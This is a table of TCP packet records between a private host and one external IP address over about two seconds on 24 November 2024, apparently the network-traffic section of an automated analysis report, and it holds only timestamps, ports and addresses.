Nov 24, 2024 20:12:22.693361044 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.693371058 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.693470001 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.693538904 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.693540096 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.693550110 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.693562031 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.693591118 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.693614006 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.713969946 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.713979006 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.714131117 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.715306044 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.715321064 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.715363026 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.736957073 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.736965895 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.737025023 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.738702059 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.738712072 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.738746881 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.738766909 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.738799095 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.749365091 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.749403000 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.749469995 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.751694918 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.752469063 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.813663006 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.813673973 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.813684940 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.813766003 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.813879967 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.813879967 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.835339069 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.835347891 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.835355997 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.835402012 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.835443020 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.836735010 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.836744070 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.837008953 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.860200882 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.860210896 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.860275030 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.861681938 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.861691952 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.861742020 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.874209881 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.874219894 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.874272108 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.876539946 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.876549006 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.876606941 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.939920902 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.939937115 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.939944983 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.940001011 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.940026045 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.940447092 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.940455914 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.940495968 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.961497068 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.961544037 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.961615086 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.962810040 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.962831020 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.962887049 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.987215042 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.987225056 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.987303972 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:22.989222050 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.989295006 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:22.989345074 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.000668049 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.000677109 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.000739098 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.002722025 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.002729893 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.002787113 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.066318989 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.066394091 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.066396952 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.066448927 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.066564083 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.066581964 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.066607952 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.066627026 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.088097095 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.088203907 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.088268042 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.088973999 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.088983059 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.089027882 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.113312006 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.113321066 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.113325119 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.113394976 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.115282059 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.115329027 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.115334988 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.115376949 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.115475893 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.115521908 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.126302004 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.126311064 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.126445055 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.128261089 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.128268957 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.128413916 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.191726923 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.191796064 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.191854954 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.191900969 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.214152098 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.214212894 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.219923973 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.219975948 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.239274979 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.239339113 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.243648052 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.243699074 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.252018929 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.252073050 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.253870010 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.253910065 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.253921986 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.253968000 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.314929962 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.314989090 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.315030098 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.315080881 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.337616920 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.337693930 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.338329077 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.338396072 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.343859911 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.343903065 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.363652945 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.363723993 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.367743969 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.367804050 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.374911070 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.374965906 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.376712084 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.376722097 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.376769066 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.438180923 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.438246965 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.438304901 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.438349962 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.457679033 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.457734108 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.458422899 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.458472013 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.463773966 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.463848114 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.483342886 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.483398914 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.487628937 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.487679005 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.494760990 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.494837999 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.496504068 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.496561050 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.496637106 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.496685028 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.496753931 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.496802092 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.557996988 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.558079004 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.558092117 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.558145046 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.577352047 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.577522993 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.577984095 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.578037024 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.583671093 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.583734989 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.603763103 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.603930950 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.607747078 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.607803106 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.614365101 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.614423990 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.615998983 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.616054058 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.616069078 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.616108894 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.661726952 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.661784887 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.678428888 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.678479910 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.678643942 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.678695917 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.701035976 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.701105118 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.705842018 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.705899000 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.731297016 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.731342077 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.731429100 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.738610983 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.738681078 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.740190029 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.740251064 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.740252018 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.740310907 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.804637909 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.804670095 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.804734945 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.804764986 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.827370882 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.827431917 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.827457905 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.827507019 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.832189083 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.832242012 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.852693081 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.852703094 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.852791071 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:23.857516050 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:23.857582092 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.023119926 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.023128986 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.023207903 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.071954012 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072012901 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072021008 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072067976 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072067976 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072122097 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072149992 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072196007 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072233915 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072283983 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072325945 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072372913 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072408915 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072458029 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072469950 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072521925 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072540045 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072585106 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072645903 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072689056 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072745085 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072788000 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.072803974 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.072846889 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.075865984 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.075942993 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.092962027 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.093019009 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.097681046 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.097742081 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.105158091 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.105266094 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.106468916 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.106522083 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.194164991 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.194243908 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.194680929 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.194731951 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.198710918 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.198765993 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.216342926 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.216413021 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.219851017 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.219908953 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.220300913 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.220347881 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.228499889 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.228549957 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.229693890 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.229748011 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.319894075 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.320014954 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.320307016 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.320367098 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.324953079 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.325052977 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.342731953 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.342798948 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.346043110 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.346101999 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.346642017 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.346719027 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.354850054 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.354931116 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.355890989 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.355972052 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.397557974 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.397663116 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570446014 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570533991 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570539951 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570607901 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570614100 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570667028 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570673943 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570729017 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570754051 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570801973 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570804119 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570854902 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570890903 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.570939064 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.570970058 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.571018934 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.571034908 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.571065903 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.571083069 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.571129084 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.576536894 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.576704979 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.594784975 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.594949007 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.607089996 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.607176065 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.608021021 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.608086109 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.649663925 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.649748087 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.696472883 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.696611881 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.702738047 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.702827930 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.720967054 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.721049070 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.733304977 CET	55615	49715	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:24.733369112 CET	49715	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:24.734283924 CET	55615	49715	185.222.58.241	192.168.2.5
